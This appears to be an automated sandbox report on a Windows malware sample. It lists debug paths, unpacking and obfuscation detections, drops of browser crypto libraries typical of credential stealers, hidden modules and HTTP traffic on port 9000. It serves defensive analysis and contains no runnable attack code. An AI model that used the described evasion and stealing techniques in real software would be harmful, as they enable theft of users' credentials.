Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: freebl3.pdb source: freebl3.dll.2.dr
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3243326923.0000021717B30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3289012458.0000021731C70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3289012458.0000021731C70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 00000003.00000002.2169721590.0000000004A01000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169460946.0000000004550000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169111990.00000000041F6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613691350.0000000004D68000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613947415.0000000005240000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000016.00000002.2706144763.000000000410D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000016.00000002.2703363636.00000000039F1000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000016.00000002.2705188750.0000000003D50000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2871966588.000000000517A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873741315.0000000005650000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.000002172935C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3319355291.0000021738BD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: P[<_C:\sedoh\56\sizagabucusa xayipo\8-rinuhololoz\nuzunum dor.pdb source: sx8RE6LbG0.exe, 00000000.00000003.2019130046.0000000003701000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000000.2018347583.0000000000412000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: freebl3.pdbp source: freebl3.dll.2.dr
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: I[L<C:\jizafova\bugu-44_jikeg_37\kisusilogeguw\rawubexuh.pdb source: sx8RE6LbG0.exe
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: nss3.pdb source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\sedoh\56\sizagabucusa xayipo\8-rinuhololoz\nuzunum dor.pdb source: sx8RE6LbG0.exe, 00000000.00000003.2019130046.0000000003701000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000000.2018347583.0000000000412000.00000002.00000001.01000000.00000005.sdmp

Source: sx8RE6LbG0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: sx8RE6LbG0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: sx8RE6LbG0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: sx8RE6LbG0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: sx8RE6LbG0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Unpacked PE file: 2.2.u2ts.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Unpacked PE file: 0.2.sx8RE6LbG0.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Unpacked PE file: 2.2.u2ts.0.exe.400000.0.unpack

.NET source code contains method to dynamically call methods (often used by packers)

Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, LHMFCLLKPJPNLPEMOOMPKGFGGJLDMBDEHOHN.cs

.Net Code: Type.GetTypeFromHandle(JJNAIKHKCKDDPOIGLAJBAGMGGMHCALFHCLGE.LNDLDDEEPFKHJPPDGFFJPKNBBHJGABJMBCCA(16777510)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(JJNAIKHKCKDDPOIGLAJBAGMGGMHCALFHCLGE.LNDLDDEEPFKHJPPDGFFJPKNBBHJGABJMBCCA(16777270)),Type.GetTypeFromHandle(JJNAIKHKCKDDPOIGLAJBAGMGGMHCALFHCLGE.LNDLDDEEPFKHJPPDGFFJPKNBBHJGABJMBCCA(16777349))})

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Code function: 2_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00416240

PE file contains an invalid checksum

Source: relay.dll.0.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: relay.dll.3.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: sx8RE6LbG0.exe	Static PE information: real checksum: 0x7dd33 should be: 0x7dd36
Source: dvffdl.4.dr	Static PE information: real checksum: 0x0 should be: 0xc411c

PE file contains sections with non-standard names

Source: u2ts.3.exe.0.dr	Static PE information: section name: .didata
Source: freebl3.dll.2.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.2.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.2.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.2.dr	Static PE information: section name: .didat
Source: nss3.dll.2.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.2.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.2.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0042786C push ecx; ret	0_2_0042787C
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0042780C push eax; ret	0_2_0042782A
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0042E3A5 push esi; ret	0_2_0042E3AE
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_00409D06 push ecx; ret	0_2_00409D19
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_004097B6 push ecx; ret	0_2_004097C9
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_01CE9120 push ecx; iretd	0_2_01CE9126
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_01CEA939 pushad ; retf	0_2_01CEA940
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_01CE808B pushad ; retf	0_2_01CE808C
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_01CEAF49 push 00000061h; retf	0_2_01CEAF51
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_01CEA623 push 2B991403h; ret	0_2_01CEA62A
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03691B72 push dword ptr [esp+ecx-75h]; iretd	0_2_03691B76
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0368C3FF push esp; retf	0_2_0368C407
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03697A73 push eax; ret	0_2_03697A91
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03679A1D push ecx; ret	0_2_03679A30
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03697AD3 push ecx; ret	0_2_03697AE3
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0368C9FD push esp; retf	0_2_0368C9FE
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03679F6D push ecx; ret	0_2_03679F80
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_004176C5 push ecx; ret	2_2_004176D8
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_0020281F push esp; retn 0039h	3_2_00202820
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00201088 push esp; retn 0039h	3_2_00201089
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_0035FAB6 push ecx; ret	3_2_0035FAC9
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_0035FB55 push ecx; ret	3_2_0035FB68
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00201DA3 push esp; retn 0039h	3_2_00201DA4
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00210F0B push 8B003CD1h; retf	3_2_00210F10
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_001FEF7F push esp; retf 0039h	3_2_001FEF80
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_001FEFA7 push eax; retf 0039h	3_2_001FEFA8
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C8047D9 push ecx; ret	3_2_6C8047EC
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C806365 push ecx; ret	3_2_6C806378

Source: dvffdl.4.dr

Static PE information: section name: .text entropy: 6.816444465715168

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File created: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File created: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File created: C:\Users\user\AppData\Local\Temp\u2ts.2\relay.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File created: C:\Users\user\AppData\Local\Temp\u2ts.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\dvffdl	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File created: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\jipsoiol	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\dvffdl			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\jipsoiol			Jump to dropped file

Creates or modifies windows services

Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\DVFFDL
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JIPSOIOL

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 9000
